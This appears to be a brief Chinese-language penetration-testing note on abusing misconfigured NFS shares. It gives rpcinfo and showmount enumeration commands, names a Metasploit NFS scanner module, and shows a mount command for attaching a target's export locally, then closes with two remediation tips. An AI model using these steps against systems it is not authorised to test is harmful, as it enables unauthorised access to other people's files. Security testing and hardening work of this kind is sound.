1.nfs簡介
NFS(Network File System)即網絡文件系統,是FreeBSD支持的文件系統中的一種,它允許網絡中的計算機之間通過TCP/IP網絡共享資源。在NFS的應用中,本地NFS的客戶端應用可以透明地讀寫位於遠端NFS服務器上的文件,就像訪問本地文件一樣。如今NFS具備了防止被利用導出文件夾的功能,但遺留系統中的NFS服務配置不當,則仍可能遭到惡意攻擊者的利用。nsf默認端口為2049。
2.漏洞利用
檢索主機是否運行了nfs服務
rpcinfo -p IP
使用showmount命令導出文件夾列表
showmount -e IP showmount IP // 連接的主機 showmount -d IP // 目錄 showmount -a IP // 掛載點
metasploit auxiliary/scanner/nfs/nfsmount模塊可以利用漏洞,查看目錄列表:
(注意:協議和端口根據實際情況變換,可使用rpcinfo 查看主機的nfs服務信息進行判斷)
本地掛載目標的nfs共享目錄
mount -t nfs 192.168.1.172:/bbsdatavol /temp -o nolock //將1.172的bbsdatavol目錄掛載到本機的temp目錄
隨后可以使用 df -h列出本機的所有磁盤信息
df -h
3.修復建議
1.使用網絡訪問控制策略,限制能夠連接到 NFS 服務器的主機范圍;
2.增加訪問認證